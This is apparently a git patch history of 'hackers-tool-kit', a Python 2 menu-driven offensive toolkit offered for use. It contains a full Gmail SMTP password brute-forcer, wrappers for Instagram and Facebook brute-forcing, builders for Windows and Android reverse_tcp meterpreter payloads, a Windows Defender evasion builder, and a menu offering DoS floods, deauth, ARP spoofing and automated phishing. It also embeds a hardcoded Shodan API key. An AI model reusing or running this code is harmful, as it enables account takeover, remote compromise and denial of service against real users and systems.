hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def terminal(): - os.system("gnome-terminal") -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - found = True -mainbanner() -main() From cdcdcc3b6bbb369f2444e763336385f5d2e75890 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 30 Mar 2019 11:26:16 -0400 Subject: [PATCH 075/214] Add files via upload --- htk.py | 2055 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2055 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..6fb48b5 --- /dev/null +++ b/htk.py @@ -0,0 +1,2055 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} 